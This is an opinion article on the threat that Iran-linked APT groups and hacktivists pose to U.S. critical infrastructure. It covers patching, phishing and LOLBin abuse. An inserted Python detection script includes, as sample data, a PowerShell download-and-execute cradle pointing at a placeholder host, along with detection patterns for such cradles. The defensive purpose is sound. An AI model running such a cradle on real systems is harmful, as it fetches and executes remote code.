Ceasefires Don't Happen in Cyberspace

Concerns continue to rise over the security of critical U.S. infrastructure.


In modern war, the declaration of a ceasefire might suspend soldiers' movement and quiet the cacophony of artillery, but it doesn't end the constant, hidden wars taking place in cyberspace. 

Real-world truces do not carry over into the realm of bits and bytes. Amid escalating geopolitical tensions, epitomized by CISA's latest alert of potential Iran-sponsored cyber operations, it is essential that we understand the capabilities and limitations of our cybersecurity landscape and ask ourselves: Is U.S. critical infrastructure prepared for an impending widespread cyberattack?

Unlike conventional warfare, cyber operations are unbound by geographical location or traditional rules of engagement. State-sponsored Advanced Persistent Threat (APT) groups (APTs 34 and 35) and their massive cadre of hacktivist proxies are consistently well-positioned for active engagement, as the latest Iran-Israel conflict showed. While kinetic attacks were met with global calls for restraint, cyberspace saw an unprecedented mobilization of nearly 100 hacktivist operations, more than 90 percent of them pro-Iranian, churning out a relentless series of disruption attacks.

This "hacktivist horde" is an influential force multiplier for psychological operations and low-sophistication disruption. It creates a general condition of chaos against an adversary that lies beyond the reach of traditional ceasefires. This behavior forces victim organizations to spend money on investigation and response, achieving the strategic objective of psychological exhaustion for months after the cessation of physical violence.

The Forgotten Cracks in Our Online Armor

Although state actors present the most capable and dangerous threats, some of the most serious risks are often overlooked. Iran-aligned adversaries' tactics frequently exploit commonly disregarded attack surfaces within critical infrastructure networks.

The two most common first points of entry are:

  1. Exploitation of Public-Facing Applications with Known Vulnerabilities: Adversaries systematically scan for and exploit systems that have not yet been patched. The evidence consistently points to VPNs, Virtual Desktop Infrastructure (VDI), firewalls, and reverse proxies. Vulnerabilities like CVE-2024-24919, CVE-2024-3400, and older, well-documented CVEs are exploited automatically for initial penetration. These intrusions are not zero-day attacks; they are failures of cyber hygiene and patching fundamentals.
  2. High-level Social Engineering: Spear-phishing is the favored method of nearly all top APT groups. These are highly targeted, socially crafted lures that often use fake login pages to capture credentials, or use professional websites like LinkedIn to build credibility before sending a malicious link. The increasing use of Generative AI to enhance the authenticity of the lures makes them even more convincing.

Upon gaining entry into a victim's network, attackers rely heavily on Living off the Land Binaries (LOLBins), using native Windows tools like cmd.exe and PowerShell for command execution. Because this activity blends into normal administrative traffic, it is largely invisible to routine monitoring, preventing cyberdefenders from easily tracking attackers' movements.
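To make that detection problem concrete, here is an added example (not from the article) that applies a few Sigma-style heuristics to process-creation telemetry: a benign administrative PowerShell invocation passes, while an encoded command, a shell spawned by an Office application, and a download cradle are flagged. The event records, field names and the placeholder base64 string are all constructed for illustration.

```python
"""Flag suspicious use of native Windows binaries (LOLBins) in process-creation events.

The sample events are constructed to resemble Sysmon Event ID 1 / Security 4688 fields;
the rules are common defender heuristics, not a complete detection set.
"""
import re

# Constructed sample telemetry (not real data): one dict per process-creation event.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "powershell.exe Get-Service -Name Spooler"},          # routine admin use
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},  # placeholder base64
    {"Image": r"C:\Windows\System32\cmd.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "cmd.exe /c whoami"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/x')"},
]

LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
           "mshta.exe", "rundll32.exe", "regsvr32.exe"}
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# -e/-ec/-en/-enc/-EncodedCommand followed by a base64 blob of meaningful length
ENCODED_FLAG = re.compile(r"(?i)\s-(e|ec|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}")
# in-memory download-and-execute patterns
CRADLE = re.compile(r"(?i)downloadstring|invoke-expression|\bIEX\b|frombase64string")

def basename(path):
    return path.rsplit("\\", 1)[-1].lower()

def classify_event(event):
    """Return the list of rule names the event matches (empty if it looks benign)."""
    image, parent = basename(event["Image"]), basename(event["ParentImage"])
    cmd = event.get("CommandLine", "")
    if image not in LOLBINS:
        return []
    hits = []
    if parent in OFFICE_PARENTS:
        hits.append("lolbin_spawned_by_office")
    if ENCODED_FLAG.search(cmd):
        hits.append("encoded_powershell_command")
    if CRADLE.search(cmd):
        hits.append("download_cradle")
    return hits

def triage(events):
    """Return (index, rules) pairs for events that trip at least one rule."""
    return [(i, r) for i, e in enumerate(events) if (r := classify_event(e))]

if __name__ == "__main__":
    for i, rules in triage(SAMPLE_EVENTS):
        print(f"event {i}: {', '.join(rules)}")
```

Parent-process context is what separates the benign first event from the flagged ones, which is why command-line and parent fields must be collected in the first place.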

The attackers’ motives are generally not just espionage but sabotage, employing wiper malware that is designed to permanently erase data and render systems inoperable. 

U.S. Preparedness: A Doctrine of Proactive Defense

Is the U.S. prepared in the face of this omnipresent threat? The official U.S. cyber strategy, based on the "Persistent Engagement" and "Defend Forward" doctrines, is basically offensive. The role of U.S. Cyber Command (USCYBERCOM) is to counteract malicious activity at its source—operating outside friendly networks to deter attacks before they reach U.S. targets. 

However, the resiliency of the nation's 16 critical infrastructure sectors does not rely exclusively on the government's offensive capabilities. The latest CISA notice, which specifically highlights the heightened risk to the Defense Industrial Base and entities with ties to Israeli businesses, is a clear signal that private sector organizations are in the lead. 

Although the U.S. has not yet seen a coordinated, destructive attack from Iran, the threat environment continues to be volatile. Iran's cyber strategy, which effectively mixes high-level APT activity with a low-level hacktivist swarm, is to test defenses, gather intel, and sow discord. The Middle East attacks—embracing everything from wiper attacks on financial institutions to militarizing IoT cameras in civilian neighborhoods for intelligence collection—are a glimpse of what could be leveled against U.S. targets. 

Reexamining the original question, “is U.S. critical infrastructure prepared for this wave of attacks?” the answer is no; this sector remains vulnerable. Organizations must harden defenses, close existing gaps, and elevate human readiness. 

First, patch management should always be prioritized. Adopting a zero-trust security model within the organization will help cultivate the mindset that no device should be presumed safe. 

Second, since many organizations rely on third-party vendors, strict risk assessments and more stringent security requirements must be applied to all external partners. This gives organizations visibility into all of their assets. After all, organizations cannot protect what they cannot see.

Lastly, cybersecurity awareness must be considered as a key component of day-to-day operations. Every employee should be equipped to identify phishing attempts and detect malicious, socially engineered campaigns. Although U.S. critical infrastructure is not currently well-positioned to defend against a widespread cyberattack, by understanding our capabilities and limitations now, we can meaningfully limit the effects of any future malicious cyber event.
